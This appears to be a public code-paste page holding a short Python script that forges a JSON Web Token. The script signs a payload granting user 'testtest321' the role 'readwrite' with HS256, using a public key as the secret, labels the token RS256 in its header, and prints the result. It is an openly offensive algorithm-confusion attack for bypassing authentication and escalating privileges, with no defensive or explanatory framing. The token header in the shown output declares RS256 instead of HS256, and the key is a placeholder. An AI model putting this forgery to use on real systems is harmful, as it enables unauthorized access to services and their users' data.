fork download
copy 
  1. import jwt
  2.  
  3. # Placeholder public key (replace with actual key if available)
  4. public_key = "place_holder_public_key"
  5.  
  6. # JWT payload with desired role
  7. payload = {
  8. 	"login": "testtest321",
  9.     "role": "readwrite"
  10. }
  11.  
  12. # Create JWT with RS256 algorithm in header but sign with HS256 using the public key
  13. malicious_jwt = jwt.encode(payload, public_key, algorithm="HS256", headers={"alg": "RS256"})
  14.  
  15. print(malicious_jwt)
Success #stdin #stdout 0.08s 15072KB
comments (?)
stdin
copy 
1
2
10
42
11
stdout
copy 
b'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJsb2dpbiI6InRlc3R0ZXN0MzIxIiwicm9sZSI6InJlYWR3cml0ZSJ9.hx2BXyOR04ik-IBDQB08rRYF96bydwA04AqYJ04xy2g'
https://ideone.com/dT5Z94
language:
Python 3 (python  3.9.5)
created:
13 days ago
visibility:
public

Share or Embed source code

Discover > Sphere Engine API

The brand new service which powers Ideone!

Discover > IDE Widget

Widget for compiling and running the source code in a web browser!